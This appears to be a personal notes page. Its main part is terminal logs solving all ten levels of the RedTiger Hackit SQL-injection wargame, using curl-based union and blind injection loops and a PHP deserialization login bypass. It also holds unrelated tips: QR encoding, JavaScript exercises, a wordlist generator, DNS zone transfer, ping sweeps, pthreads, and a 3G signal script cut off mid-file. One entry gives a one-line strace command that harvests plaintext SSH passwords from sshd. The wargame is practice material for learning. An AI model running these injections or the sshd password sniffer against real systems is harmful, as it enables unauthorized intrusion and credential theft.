# RedTigers Hackit wargame: Level 10


# curl --silent --insecure --cookie-jar level10 --cookie level10 --request POST --data "password=646f6e745f7468726f775f73746f6e6573&level10login=Login" https://redtiger.dyndns.org/hackit/level10.php
                <b>Welcome to Level 10</b><br><br>
                Target: Bypass the login. Login as TheMaster<br>
                <br><br><br>
                <form method="post">
                        <input type="hidden" name='login' value="YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9">
                        <input type="submit" value="Login" name="dologin">
                </form>
                <br><br><br>
# echo -n "YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9" | base64 -d; echo
a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}
# echo -n 'a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}' | base64
YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=
# curl --silent --insecure --cookie level10 --request POST --data "login=YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=&dologin=Login" https://redtiger.dyndns.org/hackit/level10.php | grep is:
<br><br>The password for the hall of fame is: <b>796f75536c76645465684861636b6974477261747a</b> <br><br>

# RedTigers Hackit wargame: Level 9


# curl --silent --insecure --cookie-jar level9 --cookie level9 --request POST --data "password=736c61705f7468655f6c616d65727a&level9login=Login" https://redtiger.dyndns.org/hackit/level9.php
                <b>Welcome to Level 9</b><br><br>
                Target: Get username and password of any user. Tablename: level9_users<br>
                Its not a blind. There is a way to get an output :) <br>
                <br><br>
        Autor: RedTiger <br>Title: Lorem ipsum <br>Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. <br><br>                     <form method="POST">
                                Name: <input type="text" name="autor"> <br>
                                Title: <input type="text" name="title"><br>
                                <textarea name="text"></textarea>
                                <input type="submit" name="post">
                        </form>
                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in {1..13};  do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(username, $[14-$i]))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
546865426c7565466c6f776572
# for i in {1..145}; do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(password,$[146-$i]))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# for i in {1..13};  do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(reverse(right(reverse(username),$i)),1))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
546865426c7565466c6f776572
# for i in {1..145}; do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(reverse(right(reverse(password),$i)),1))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='),((select username from level9_users limit 1),(select password from level9_users limit 1),'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | sed 's/<br>/\n/g' | grep -A 1 Autor
Autor: RedTiger
Title: Lorem ipsum
--
Autor:
Title:
--
Autor: 546865426c7565466c6f776572
Title: 212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# curl --silent --insecure --cookie level9 --request POST --data "user=546865426c7565466c6f776572&password=253231253246666c6f776572703239253344253235643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f753733343935383337343935383734253234253235254137253235253236254137253234253236254137253234253235253236253231254137253234253235444653414446415344465344313334353334353132333472356173644651574525323525413725323425323644466173646661733233343536&login=Login" https://redtiger.dyndns.org/hackit/level9.php | grep is:
<br>The password for the next level is: <b>646f6e745f7468726f775f73746f6e6573</b> <br><br>

# RedTigers Hackit wargame: Level 8


# curl --silent --insecure --cookie-jar level8 --cookie level8 --request POST --data "password=4d4f4f636f774d454f57636174&level8login=Login" https://redtiger.dyndns.org/hackit/level8.php
                <b>Welcome to Level 8</b><br><br>
                Target: Get the password of the admin.<br><br><br>

                Username: Admin<br>
                <form method="POST">
                        Email: <input type="text" name="email" value="hans@localhost"> <br>
                        Name: <input type="text" name="name" value="Hans"> <br>
                        ICQ: <input type="text" name="icq" value="12345"> <br>
                        Age: <input type="text" name="age" value="25"> <br>
                        <input type="submit" name="edit" value="Edit">
                </form>
                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in `seq 1 20`; do email="' or length(password)='$i"; result=`curl --silent --insecure --cookie level8 --request POST --data "email=$email&edit=Edit" https://redtiger.dyndns.org/hackit/level8.php | grep email | grep 1`; if [ "$result" != "" ]; then echo $i; break; fi; done
18
# for i in `seq 1 18`; do for j in `echo {a..z} {0..9}`; do email="' or left(right(password,$[19-$i]),1)='$j"; result=`curl --silent --insecure --cookie level8 --request POST --data "email=$email&edit=Edit" https://redtiger.dyndns.org/hackit/level8.php | grep email | grep 1`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
7468656d65616e696e676f666c6966653432
# curl --silent --insecure --cookie level8 --request POST --data "user=Admin&password=7468656d65616e696e676f666c6966653432&login=Login" https://redtiger.dyndns.org/hackit/level8.php | grep is:
<br>The password for the next level is: <b>736c61705f7468655f6c616d65727a</b> <br><br>

# RedTigers Hackit wargame: Level 7


# curl --silent --insecure --cookie-jar level7 --cookie level7 --request POST --data "password=646f6e745f73686f75745f61745f796f75725f6469736b73&level7login=Login" https://redtiger.dyndns.org/hackit/level7.php
                <b>Welcome to Level 7</b><br><br>
                Target: Get the name of the user who posted the news about google. Table: level7_news column: autor<br>
                Restrictions: no comments, no substr, no substring, no ascii, no mid, no like<br>
                <br><br><br> <form method="post"> <input type="text" name="search" value=""> <input type="submit" value="search!" name="dosearch"> </form> <br><br><br>
                                <br>
                        <form method="post">
                                Username: <input type="text" name="username"><br>
                                <input type="submit" name="try" value="Check!">
                        </form>
                        <br>
# for i in `seq 1 17`; do for j in `echo {A..Z} {a..z} {0..9}`; do d=`printf "%d\n" \'$j`; search="Google%' and ord(left(right(news.autor,$[18-$i]),1))=$d and '%'='"; result=`curl --silent --insecure --cookie level7 --request POST --data "search=$search&dosearch=search\!" https://redtiger.dyndns.org/hackit/level7.php | grep -v "<input" | grep Google`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
5465737455736572666f72673030676c65
# curl --silent --insecure --cookie level7 --request POST --data "username=5465737455736572666f72673030676c65&try=Check\!" https://redtiger.dyndns.org/hackit/level7.php | grep is:
<br>The password for the next level is: <b>4d4f4f636f774d454f57636174</b> <br><br>

# RedTigers Hackit wargame: Level 6


# curl --silent --insecure --cookie-jar level6 --cookie level6 --request POST --data "password=6d795f6361745f736179735f6d656f776d656f77&level6login=Login" https://redtiger.dyndns.org/hackit/level6.php
                <b>Welcome to Level 6</b><br><br>
                Target: Get the first user in table level6_users with status 1<br>
                <br><br><br> <a href="?user=1">Click me</a><br><br><br>
                                <table style="border-collapse:collapse; border:1px solid black;">
                                <tr>
                                        <td>Username: </td>
                                        <td>deddlef</td>
                                </tr>
                                <tr>
                                        <td>Email: </td>
                                        <td>dumbi@damibi.de</td>
                                </tr>
                        </table>

                                        <br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in `seq 1 30`; do echo $i; result=`curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=0%20or%20if((select%20length(password)%20from%20level6_users%20where%20id=3)=$i,true,false)" | grep deddlef`; if [ "$result" != "" ]; then break; fi; done
1
2
3
4
5
6
7
8
9
10
11
# for i in `seq 1 11`; do for j in `echo {a..z} {0..9}`; do d=` printf "%d\n" \'$j`; result=`curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=0%20or%20if((select%20ord(left(right(password,$[12-$i]),1))%20from%20level6_users%20where%20id=3)=$d,true,false)" | grep deddlef`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
6d306e737465726b316c6c
# query2="`echo -n "' union select id,username,email,password,status from level6_users where status=1 limit 1 -- " | xxd -p | tr -d '\n'`"
# query1="`echo -n \"0 union select 1,0x$query2,3,4,5\" | sed 's/ /%20/g'`"
# curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=$query1" | grep -A 1 -e ">Username" -e Email
                                        <td>Username: </td>
                                        <td>admin</td>
--
                                        <td>Email: </td>
                                        <td>6d306e737465726b316c6c</td>
# curl --silent --insecure --cookie level6 --request POST --data "user=admin&password=6d306e737465726b316c6c&login=Login" https://redtiger.dyndns.org/hackit/level6.php | grep is:
<br>The password for the next level is: <b>646f6e745f73686f75745f61745f796f75725f6469736b73</b> <br><br>

# RedTigers Hackit wargame: Level 5


# curl --silent --insecure --cookie-jar level5 --cookie level5 --request POST --data "password=62616e616e61735f6172655f6e6f745f626c7565&level5login=Login" https://redtiger.dyndns.org/hackit/level5.php
                <b>Welcome to Level 5</b><br><br>
                Target: Bypass the login<br>
                Disabled: substring , substr, ( , ), mid<br>
                Hints: its not a blind, the password is md5-crypted, watch the login errors<br><br><br>

                        <form name="login" action="?mode=login" method="POST">
                                Username: <input name="username" size="30" type="text"><br>
                                Password: <input name="password" size="30" type="text">
                                <br>
                                <input name="login" value="Login" type="submit">
                        </form>
# password="whatever"
# echo -n $password | md5sum
008c5926ca861023c1d2a36653fd88e2  -
# username="' union select 'user','008c5926ca861023c1d2a36653fd88e2"
# curl --silent --insecure --cookie level5 --request POST --data "username=$username&password=$password&login=Login" https://redtiger.dyndns.org/hackit/level5.php?mode=login | grep is:
<br>The password for the next level is: <b>6d795f6361745f736179735f6d656f776d656f77</b> <br><br>

# RedTigers Hackit wargame: Level 4


# curl --silent --insecure --cookie-jar level4 --cookie level4 --request POST --data "password=646f6e745f7075626c6973685f736f6c7574696f6e735f41524748&level4login=Login" https://redtiger.dyndns.org/hackit/level4.php
                <b>Welcome to Level 4</b><br><br>
                Target: Get the value of the first entry in table level4_secret in column keyword<br>
                Disabled: like<br><br><br> <a href="?id=1">Click me</a><br><br><br>
        Query returned 1 rows. <br /><br />                     <br><br><br>
                        <form method="post">
                                Word: <input type="text" name="secretword"><br>
                                <input type="submit" name="go" value="Go!">
                        </form>
                        <br>
# for i in `seq 1 50`; do echo $i; result=`curl --silent --insecure --cookie level4 "https://redtiger.dyndns.org/hackit/level4.php?id=1%20and%20if((select%20length(keyword)%20from%20level4_secret)=$i,1,0)" | grep Query | awk '{print $3}'`; if [ "$result" == "1" ]; then break; fi; done
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# for i in `seq 1 17`; do for j in `echo {a..z} {0..9}`; do result=`curl --silent --insecure --cookie level4 "https://redtiger.dyndns.org/hackit/level4.php?id=1%20and%20if((select%20substring(keyword,$i,1)%20from%20level4_secret)='$j',1,0)" | grep Query | awk '{print $3}'`; if [ "$result" == "1" ]; then echo -n "$j"; break; fi; done; done; echo
626c696e64696e6a656374696f6e313233
# curl --silent --insecure --cookie-jar level4 --cookie level4 --request POST --data 'secretword=626c696e64696e6a656374696f6e313233&go=Go!' https://redtiger.dyndns.org/hackit/level4.php | grep is:
<br>The password for the next level is: <b>62616e616e61735f6172655f6e6f745f626c7565</b> <br><br>

# RedTigers Hackit wargame: Level 3


# curl --silent --insecure --cookie-jar level3 --cookie level3 --request POST --data "password=73656375726974796d656f775f736179735f636174&level3login=Login" https://redtiger.dyndns.org/hackit/level3.php
                <b>Welcome to Level 3</b><br> <br>
                Target: Get the password of the user Admin.<br>
                Hint: Try to get an error. Tablename: level3_users<br><br><br>

        Show userdetails: <br><a href="?usr=MTQ4MTY4MTY1MTMxMTc1MTgz">TheCow</a><br><a href="?usr=MTI5MTY0MTczMTY5MTc0">Admin</a><br>                   <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# curl --silent --insecure --cookie level3 "https://redtiger.dyndns.org/hackit/level3.php?usr\[\]=" | grep Warning
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/hackit/urlcrypt.inc on line 21
# curl --silent --insecure --output urlcrypt.inc https://redtiger.dyndns.org/hackit/urlcrypt.inc
# cat myurlcrypt.inc
#!/usr/bin/php
<?php
 function encrypt($str) {
  $cryptedstr = "";
  for ($i =0; $i < strlen($str); $i++){
   $temp = ord(substr($str,$i,1)) ^ 192;
   while(strlen($temp)<3){
    $temp = "0".$temp;
   }
   $cryptedstr .= $temp. "";
  }
  return base64_encode($cryptedstr);
 }
 echo encrypt($argv[1])."\n";
?>
# ./myurlcrypt.inc "' union select 1,2,3,4,5,6,7 -- "
MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MjQ2MjM2MjQ3MjI0MjM3MjM3MjI0
# curl --silent --insecure --cookie level3 https://redtiger.dyndns.org/hackit/level3.php?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MjQ2MjM2MjQ3MjI0MjM3MjM3MjI0
                <b>Welcome to Level 3</b><br> <br>
                Target: Get the password of the user Admin.<br>
                Hint: Try to get an error. Tablename: level3_users<br><br><br>

        Show userdetails: <br>                          <table style="border-collapse:collapse; border:1px solid black;">
                                        <tr>
                                                <td>Username: </td>
                                                <td>2</td>
                                        </tr>
                                        <tr>
                                                <td>First name: </td>
                                                <td>6</td>
                                        </tr>
                                        <tr>
                                                <td>Name: </td>
                                                <td>7</td>
                                        </tr>
                                        <tr>
                                                <td>ICQ: </td>
                                                <td>5</td>
                                        </tr>
                                        <tr>
                                                <td>Email: </td>
                                                <td>4</td>
                                        </tr>
                                </table>

                                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# ./myurlcrypt.inc "' union select 1,2,3,password,username,6,7 from level3_users where username='Admin' -- "
MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQ2MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjMxMjI0MjM3MjM3MjI0
# curl --silent --insecure --cookie level3 https://redtiger.dyndns.org/hackit/level3.php?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQ2MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjMxMjI0MjM3MjM3MjI0 | grep -A 1 -e ICQ -e Email
                                                <td>ICQ: </td>
                                                <td>Admin</td>
--
                                                <td>Email: </td>
                                                <td>746869736973617665727973656375726570617373776f7264454545357274</td>
# curl --silent --insecure --cookie level3 --request POST --data "user=Admin&password=746869736973617665727973656375726570617373776f7264454545357274&login=Login" https://redtiger.dyndns.org/hackit/level3.php | grep is:
<br>The password for the next level is: <b>646f6e745f7075626c6973685f736f6c7574696f6e735f41524748</b> <br><br>

# RedTigers Hackit wargame: Level 2


# curl --silent --insecure --cookie-jar level2 --cookie level2 --request POST --data "password=656173796c6576656c7361726565617379&level2login=Login" https://redtiger.dyndns.org/hackit/level2.php
<b>Welcome to level 2</b>
<br><br>
A simple loginbypass
<br><br>
Target: Login
<br>
Hint: Condition
<br><br><br>

<form method="POST">
        Username: <input type="text" name="username"><br>
        Password: <input type="password" name="password"><br>
        <input type="submit" name="login" value="Login">
</form>
# curl --silent --insecure --cookie level2 --request POST --data "username=' or 'u'='u&password=' or 'p'='p&login=Login" https://redtiger.dyndns.org/hackit/level2.php | grep is:
<br>The password for the next level is: <b>73656375726974796d656f775f736179735f636174</b> <br><br>

# RedTigers Hackit wargame: Level 1


# curl --silent --insecure https://redtiger.dyndns.org/hackit/level1.php
<b>Welcome to level 1</b>
<br><br>
Lets start with a simple injection.
<br><br>
Target: Get the login for the user Hornoxe
<br>
Hint: You really need one? omg -_-
<br>
Tablename: level1_users
<br><br><br>


<br>Category: <a href="?cat=1">1</a><br><br>This category does not exist! <br>                  <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# curl --silent --insecure "https://redtiger.dyndns.org/hackit/level1.php?cat=1%20union%20select%201,2,username,password%20from%20level1_users" | grep ">Hornoxe" | awk -F "<br>" '{print $4}'
7468617477617365617379
# curl --silent --insecure --request POST --data "user=Hornoxe&password=7468617477617365617379&login=Login" https://redtiger.dyndns.org/hackit/level1.php | grep is:
<br>The password for the next level is: <b>656173796c6576656c7361726565617379</b> <br><br>

# Encode and decode QR codes


Introduction

QR (Quick Response) code is a type of matrix (2D) barcode.
QR codes have greater storage capacity compared to standard UPC (Universal Product Code) barcodes.

http://en.wikipedia.org/wiki/QR_code

Encode

# apt-get install qrencode
# wc -c glider.png
724 glider.png
# xxd -p -c 724 glider.png | qrencode -o qrcode.png
Decode

# apt-get install zbar-tools
# zbarimg --quiet --raw qrcode.png | xxd -p -r > result
# file result
result: PNG image data, 55 x 55, 8-bit grayscale, non-interlaced

# Codecademy: JavaScript


1. Introduction

"text";
"text".length;
3 + 4;
4 / 2;
14 % 3;
//comment
confirm("I feel awesome");
prompt("What is your name?");
["I'm coding like a champ!".length] > 10
console.log("Hello");
console.log(15 > 4);
console.log("Xiao Hui".length < 122);
console.log("Goody Donaldson".length != 8);
console.log(8*2 === 16);
console.log(true !== true);
if ( 1 > 2 ) {
 alert("I am right");
} else {
 console.log("I am wrong");
}
"wonderful day".substring(3,7);
var myName = "Leng";
var myAge = 30;
var isOdd = true;
myName.length;
var age = prompt("What's your age?");
2. Functions

var divideByThree = function (number) {
 var val = number / 3;
 console.log("Result = " + val);
};
divideByThree(6);

var timesTwo = function(number) {
 return number * 2;
};
var newNumber = timesTwo(2);
console.log(newNumber);

var perimeterBox  = function(length, width) {
 return length*2 + width*2;
};
perimeterBox(2,2);

var multiplied = 5; // Global
var timesTwo = function(number) {
 var multiplied = number * 2; // Local
};
timesTwo(4);
console.log(multiplied);
3. 'For' Loops

for (var counter = 1; counter < 11; counter++) {
 console.log(counter);
}

for (var i = 5; i <= 50; i+=5) {
 console.log(i);
}

for (var i = 10; i >= 0; i--) {
 console.log(i);
}

for (var i = 100; i >= 1; i-=5) {
 console.log(i);
}

var junk = ["Mao","Gandhi",1,2];
console.log(junk);
console.log(junk[0]);
console.log(junk.length);
4. 'While' Loops

var understand = true;
while( understand ){
 console.log("I'm learning while loops!");
 understand = false;
}

loopCondition = false;
do {
 console.log("I'm gonna stop looping 'cause my condition is " + String(loopCondition) + "!");
} while (loopCondition);
5. More on Control Flow

var lunch = prompt("What do you want for lunch?","Type your lunch choice here");
switch(lunch){
 case 'sandwich':
  console.log("Sure thing! One sandwich, coming up.");
  break;
 case 'soup':
  console.log("Got it! Tomato's my favorite.");
  break;
 case 'salad':
  console.log("Sounds good! How about a caesar salad?");
  break;
 case 'pie':
  console.log("Pie's not a meal!");
  break;
 default:
  console.log("Huh! I'm not sure what " + lunch + " is. How does a sandwich sound?");
}

true && true // => true
false || false // => false
!true // => false
!false // => true
6. Data Structures

var newArray = [[11,12,13], [21,22,23], [31,32,33]];
var jagged = [[11,12,13], [21], [31,32]];
var phonebookEntry = {};
phonebookEntry.name = 'Oxnard Montalvo';
phonebookEntry.number = '(555) 555-5555';
phonebookEntry.phone = function() {
 console.log('Calling ' + this.name + ' at ' + this.number + '...');
};
phonebookEntry.phone();

var myObj = new Object();
myObj["name"] = "Charlie";
myObj.name = "Charlie";
7. Objects I

var bob = {};
var bob = {
 name: "Bob Smith",
 age: 30
};
var name = bob.name;
var age = bob.age;

var dog = {
 species: "greyhound",
 weight: 60,
 age: 4
};
var species = dog["species"];
var weight = dog["weight"];
var age = dog["age"];

var bob = new Object();
bob.name = "Bob Smith";
bob.age = 30;
bob.setAge = function (newAge){
 this.age = newAge;
};
bob.setAge(40);

function Person(name,age) {
 this.name = name;
 this.age = age;
}
var bob = new Person("Bob Smith", 30);

var family = new Array();
family[0] = new Person("alice", 40);
family[1] = new Person("bob", 42);

var ageDifference = function(person1, person2) {
  return person1.age - person2.age;
}
var alice = new Person("Alice", 30);
var billy = new Person("Billy", 25);
var diff = ageDifference(alice,billy);
8. Objects II

var myObj = { job: "I'm an object!" };
console.log( typeof myObj ); // => object
console.log( myObj.hasOwnProperty('job') ); // => true

var nyc = {
 fullName: "New York City",
 mayor: "Michael Bloomberg",
 population: 8000000,
 boroughs: 5
};
for (var property in nyc){
 console.log(property);
}
for (var i in nyc){
 console.log(nyc[i]);
}

function Dog (breed) {
 this.breed = breed;
};
var buddy = new Dog("golden Retriever");
Dog.prototype.bark = function() {
 console.log("Woof");
};

function Animal(name, numLegs) {
 this.name = name;
 this.numLegs = numLegs;
}
Animal.prototype.sayName = function() {
 console.log("Hi my name is " + this.name);
};
function Penguin(name){
 this.name = name;
 this.numLegs = 2;
}
Penguin.prototype = new Animal();

function Person(first,last,age) {
 this.firstname = first;
 this.lastname = last;
 this.age = age;
 var bankBalance = 7500; // Private var
 this.getBalance = function() {
  return bankBalance;
 };
 var returnBalance = function() { // Private function
  return bankBalance;
 };     
 this.askTeller = function() {
   return returnBalance;
 }
}

# Key generator


# cat keygen
#!/bin/bash

length=$1
alphabet="$2"
function=""

for i in `seq $length`; do
        function+="for p$i in $alphabet; do "
done
function+="echo "
for i in `seq $length`; do
        function+="\$p$i"
done
for i in `seq 1 $length`; do
        function+="; done"
done

/bin/bash -c "set -o noglob;$function"
# ./keygen 3 "{a..z} {A..Z} {0..9}"
aaa
aab
aac
aad
aae
...
995
996
997
998
999

# DNS zone transfer


dig

# dig @dns_server domain axfr
nslookup

C:> nslookup - dns_server
> set type=any
> ls -d domain

# Keyboard shortcuts


bash

ctrl+p: History: previous command (arrow_up).
ctrl+n: History: next command (arrow_down).
ctrl+d: Signal end-of-file (EOF). Close the window, exit program.
ctrl+c: Abort current command/typing.
ctrl+w: Erase word to the left.
alt+d: Erase word to the right.
ctrl+u: Erase line to the left.
ctrl+k: Erase line to the right.
ctrl+y: Yank/Paste previously erased string.
alt+b: Move one word to the left.
alt+f: Move one word to the right.
ctrl+a: Move to beginning of line.
ctrl+e: Move to end of line.
ctrl+r: History: reverse search.
ctrl+z: Stop execution of the current job.
tab: Autocomplete command/file name.
shift+ins: Paste contents of clipboard at cursor.
shift+page_up: Scroll window up.
shift+page_down: Scroll window down.

cmd

arrow_up: History: previous command.
arrow_down: History: next command.
ctrl+c: Abort current command/typing.
ctrl+home: Erase line to the left.
ctrl+end: Erase line to the right.
ctrl+arrow_left: Move one word to the left.
ctrl+arrow_right: Move one word to the right.
home: Move to beginning of line.
end: Move to end of line.
F8: History: reverse search.
tab: Autocomplete file name.


vim

x: Delete char to the right of cursor.
dw: Delete word to the right of cursor.
db: Delete word to the left of cursor.
0: Go to start of line.
$: Go to end of line.
1G: Go to start of document.
$G: Go to end of document.
b: Go to previous word.
w: Go to next word.
k: Go to previous line (arrow-up).
j: Go to next line (arrow-down).
{: Go to previous paragraph.
}: Go to next paragraph.
/: Search.
N: Go to previous search result.
n: Go to next search result.
:%s/yin/yang/g: Search and replace.

# Fast tools for ping sweeps


nmap

# apt-get install nmap
# nmap -n -sn -PE -T5 --max-retries 1 --min-parallelism 100 -iL subnets.txt
46432 IP addresses scanned in 72 seconds
# nmap -n -sn -PE -T5 --max-retries 0 --min-parallelism 100 -iL subnets.txt | grep -v Warning
46432 IP addresses scanned in 48 seconds

zmap

# wget https://github.com/zmap/zmap/archive/v1.0.0.tar.gz
# tar xvzf v1.0.0.tar.gz
# cd zmap-1.0.0
zmap-1.0.0# cat INSTALL
zmap-1.0.0# apt-get install libgmp3-dev gengetopt libpcap-dev
zmap-1.0.0# cd src
zmap-1.0.0/src# make
zmap-1.0.0/src# make install
zmap-1.0.0/src# cd
# rm -rf zmap-1.0.0 v1.0.0.tar.gz
# sed -i 's/^black/#black/' /etc/zmap/zmap.conf
# zmap -M icmp_echoscan -B 1G -P 1 -T 100 -w subnets.txt
46432 IP addresses scanned in 72 seconds

# Posix threads in C


Differences between processes and threads

- Processes do not share their address space while threads are executed under the same process address space.
- Context switching is faster between threads than between processes.
- Threads can directly communicate (mutex, direct memory access) with other threads of its process but processes must use IPC (signals, semaphores, queues, shared memory) to communicate with other processes.

Code example

# cat threads_example.c
#include <pthread.h>
#include <stdio.h>

pthread_mutex_t pm;

void *inc_x(void *x_void_ptr){
        int *x_ptr=(int *)x_void_ptr;
        while(*x_ptr<10000){
                pthread_mutex_lock(&pm);
                        (*x_ptr)++;
                        printf("[+]x=%d\n",*x_ptr);
                pthread_mutex_unlock(&pm);
        }
        printf("x increment finished\n");
}

void *dec_x(void *x_void_ptr){
        int *x_ptr=(int *)x_void_ptr;
        while(*x_ptr>0){
                pthread_mutex_lock(&pm);
                        (*x_ptr)--;
                        printf("[-]x=%d\n",*x_ptr);
                pthread_mutex_unlock(&pm);
        }
        printf("x decrement finished\n");
}

int main(){
        int x=5000;
        pthread_t inc_x_thread;
        pthread_t dec_x_thread;
        printf("Initial x=%d\n",x);
        pthread_mutex_init(&pm,NULL);
        pthread_create(&inc_x_thread,NULL,inc_x,&x);
        pthread_create(&dec_x_thread,NULL,dec_x,&x);
        pthread_join(inc_x_thread,NULL);
        pthread_join(dec_x_thread,NULL);
        pthread_mutex_destroy(&pm);
        printf("Final x=%d\n",x);
        return 0;
}
# gcc -o threads_example threads_example.c -lpthread

# Getting passwords of all users


# strace -f -e "read" -p `ps axuf | grep -m 1 sshd | awk '{print $2}'` 2>&1 | grep -e '\\7\\0\\0\\0\\4' -e '\\v\\0\\0\\0\\10'

# Getting the 3G signal strength value


Using chat

# sakis3g disconnect
Disconnected.
# chat -V -s '' 'AT+CSQ' 'OK' '' > /dev/ttyUSB0 < /dev/ttyUSB0
AT+CSQ
+CSQ: 19,99

OK
Using comgt

# sakis3g disconnect
Disconnected.
# comgt -d /dev/ttyUSB0 sig
Signal Quality: 19,99
Script with chat
# cat get_rssi
#!/bin/bash

ubp="/usr/bin"
ulsp="/usr/local/sbin"
device="/dev/ttyUSB0"
output="/dev/null"

$ulsp/sakis3g disconnect > $output

rssi=`printf "%.f\n" $(($ubp/chat -V -s '' 'AT+CSQ' 'OK' '' > $device < $device) 2>&1 | $ubp/grep CSQ: | $ubp/awk '{print $2}')`
echo "RSSI = $rssi"
echo -n "Quality = "
if [ $rssi -gt 25 ]; then
        echo "Excellent ( 25 < RSSI )"
